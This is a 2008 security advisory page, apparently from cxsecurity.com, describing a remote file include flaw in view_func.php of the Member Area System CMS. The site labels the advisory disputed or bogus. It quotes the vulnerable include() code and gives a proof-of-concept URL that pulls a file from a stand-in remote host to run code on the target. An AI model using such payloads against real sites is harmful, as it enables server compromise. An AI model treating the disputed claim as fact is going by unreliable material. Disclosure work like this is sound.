WARNING! Fake news / Disputed / BOGUS

Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

2008.01.16
Credit: ship_nx
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

---------------------------------------------------------------------- Member Area System (MAS) Remote File Include Vulnerability (view_func.php) ---------------------------------------------------------------------- Author: ShipNX <ship_nx [AT] yahoo com> Impact: Remote file include Status: Patch not available ---------------------------------------------------------------------- Software description: Name: Member Area System (MAS) Version: Vendor does not disclose version information since v1.7. Probably later versions are also vulnerable Vendor: Mansion Productions Vendor homepage: http://www.mansionproductions.com/ Software homepage: http://www.mansionproductions.com/mas/ Description: MAS is a leading content management system (CMS) specially designed for adult-oriented sites managements. It is used on many major adult sites around the world. ---------------------------------------------------------------------- Vulnerability: Code: view_func.php ... $path=dirname($i).'/'; include($path.$l.'/'.'filelist.mas'); ... The variables $i and $l are not properly sanitized before using them in include() construction. If Register Globals = On and Allow URL Include (Allow URL Fopen) = On then an attacker can send the malicious request leading to remote file include and therefore arbitrary command execution. --------------------------------------------------------------------- POC: Conditions: Register Globals = On Allow URL fopen (Allow URL include since PHP 5.2.0) = On http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedi r/&l=testfile.txt? Note: justsomedir/ is required here as data passed via $i first gets sent to dirname() function which will product $path='http://remotesite.com/'; The remote file should be placed at http://remotesite.com/testfile.txt ---------------------------------------------------------------------- Workaround: The vendor is aware of the vuln for ages (probably since 2006) so they recommend setting up Register Globals = Off. Not sure why they haven't patched the vuln already. If Register Globals is Off on your server, then you are more or less secure. If it is On, ask your system administrator to turn it Off. If for some reason you need Register Globals = On on your site (using old software etc), then contact the vendor and MAYBE they will finally patch the bug :-) ---------------------------------------------------------------------- History: Vuln found: Late 2005 :-)) Vendor notified: Seems like the vendor knows of the vuln since 2006, but for some reason fails to patch the vuln. Maybe they just want it to keep quiet, or maybe the security matters just don't bother them - not sure. Anyway, maybe this advisory will finally force them to do patching :-)) Advisory: 11/01/2008 ---------------------------------------------------------------------- Thanks to: DeZender creators :-)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top